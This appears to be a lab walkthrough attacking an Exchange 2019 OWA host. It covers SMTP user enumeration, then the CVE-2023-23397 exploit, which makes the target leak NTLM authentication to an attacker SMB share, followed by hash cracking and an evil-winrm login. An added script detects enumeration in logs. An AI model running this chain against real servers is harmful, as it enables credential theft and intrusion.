# OWA Exchange Server 2019

## Nmap

```shell
nmap -p- -A <IP> -oA myHost
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI
53/tcp    open  domain               Simple DNS Plus
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP (Domain:DOMAIN
443/tcp   open  ssl/https
444/tcp   open  snpp?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
465/tcp   open  smtp                 Microsoft Exchange smtpd
587/tcp   open  smtp                 Microsoft Exchange smtpd
|_  Product_Version: 10.0.17763
593/tcp   open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
717/tcp   open  smtp                 Microsoft Exchange smtpd
808/tcp   open  ccproxy-http?
890/tcp   open  mc-nmf               .NET Message Framing
1801/tcp  open  msmq?
2103/tcp  open  msrpc                Microsoft Windows RPC
2105/tcp  open  msrpc                Microsoft Windows RPC
2107/tcp  open  msrpc                Microsoft Windows RPC
3268/tcp  open  ldap                 Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after:  X
| rdp-ntlm-info:
|   Target_Name: DOMAIN
|   NetBIOS_Domain_Name: DOMAIN
|   NetBIOS_Computer_Name: DOMAIN
|   DNS_Domain_Name: DOMAIN
|   DNS_Computer_Name: DOMAIN
|   DNS_Tree_Name: DOMAIN
|   Product_Version: 10.0.17763
|_  System_Time: XXX
3875/tcp  open  msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
6067/tcp  open  msrpc                Microsoft Windows RPC
...
64327/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open  mc-nmf               .NET Message Framing
```

## OWA - HTTPS 443

<https://github.com/kh4sh3i/exchange-penetration-testing.git>

```shell
git clone https://github.com/kh4sh3i/exchange-penetration-testing.git
cd exchange-penetration-testing

python3 get_exchange_version.py https://10.129.229.14

Build number:15.2.1118
Exchange Server 2019
```

### SMTP

<https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true>

```shell
wget https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt

└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>

######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN exists
```
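The defender-side counterpart to the RCPT enumeration above, added here as an example that is not part of the original page: it reads constructed protocol-log lines laid out like an Exchange receive-connector log (the column order is an assumption) and flags remote IPs that issue many RCPT TO commands which are mostly answered with 5xx, the signature smtp-user-enum leaves behind.

```python
import csv
from collections import defaultdict

# Columns assumed to follow the Exchange receive-connector protocol log layout:
# date-time,connector-id,session-id,sequence-number,local-endpoint,remote-endpoint,event,data,context
# event '<' = command received from the client, '>' = reply sent by the server.
def rcpt_stats(log_text):
    """Per remote IP: RCPT TO count, 5xx rejections and distinct recipients tried."""
    stats = defaultdict(lambda: {"rcpt": 0, "rejected": 0, "recipients": set()})
    pending = {}  # session-id -> IP whose last RCPT TO awaits the server reply
    for row in csv.reader(log_text.splitlines()):
        if len(row) != 9 or row[0].startswith("#"):
            continue  # header/comment lines or truncated rows
        session, remote, event, data = row[2], row[5], row[6], row[7]
        ip = remote.rsplit(":", 1)[0]
        if event == "<" and data.upper().startswith("RCPT TO:"):
            rcpt = data.split(":", 1)[1].strip().strip("<>").lower()
            stats[ip]["rcpt"] += 1
            stats[ip]["recipients"].add(rcpt)
            pending[session] = ip
        elif event == ">" and session in pending:
            if data.startswith("5"):
                stats[pending[session]]["rejected"] += 1
            del pending[session]
    return stats

def flag_enumerators(log_text, min_rcpt=5, min_reject_ratio=0.6):
    """IPs matching the smtp-user-enum pattern: many recipients, mostly 5xx (thresholds illustrative)."""
    flagged = {}
    for ip, s in rcpt_stats(log_text).items():
        ratio = s["rejected"] / s["rcpt"] if s["rcpt"] else 0.0
        if s["rcpt"] >= min_rcpt and ratio >= min_reject_ratio:
            flagged[ip] = {"rcpt": s["rcpt"], "rejected": s["rejected"],
                           "distinct": len(s["recipients"])}
    return flagged

# Constructed sample log (not real Exchange output): one scanner trying six
# names in a single session, and one partner MTA delivering to a real mailbox.
def _line(session, seq, remote, event, data):
    return (f"2024-05-02T09:00:{seq:02d}.000Z,EX01\\Default Frontend EX01,"
            f"{session},{seq},10.129.229.14:25,{remote},{event},{data},")

_rows = []
for i, user in enumerate(["aaron", "abby", "adam", "admin", "alex", "validaccount"]):
    reply = "250 2.1.5 Recipient OK" if user == "validaccount" else "550 5.1.1 User unknown"
    _rows.append(_line("08DC1", 2 * i, "10.10.16.158:51000", "<", f"RCPT TO:<{user}@ad.domain>"))
    _rows.append(_line("08DC1", 2 * i + 1, "10.10.16.158:51000", ">", reply))
_rows.append(_line("08DC2", 0, "10.0.0.5:40000", "<", "RCPT TO:<validaccount@ad.domain>"))
_rows.append(_line("08DC2", 1, "10.0.0.5:40000", ">", "250 2.1.5 Recipient OK"))
SAMPLE_LOG = "\n".join(_rows)
```

On the constructed sample, `flag_enumerators(SAMPLE_LOG)` reports only 10.10.16.158 (6 RCPT, 5 rejected, 6 distinct names); the partner MTA with a single accepted recipient stays below the thresholds.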

## CVE-2023-23397

{% embed url="<https://github.com/BronzeBee/cve-2023-23397>" fullWidth="false" %}
CVE-2023-23397
{% endembed %}

```shell
git clone https://github.com/BronzeBee/cve-2023-23397.git

┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee

[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1
```

Before running the exploit, start an SMB server (impacket) so the incoming NTLM authentication is captured:

`impacket-smbserver -smb2support share .`

![](/files/mkO6UzawFO3Z3QcNY1Ni)

## John the Ripper - crack NTLM hash

`john --wordlist=/usr/share/wordlists/rockyou.txt hash`

## WinRM - TCP 5985

```shell
evil-winrm -i 10.129.229.14 -u validaccount -p 'password'
```

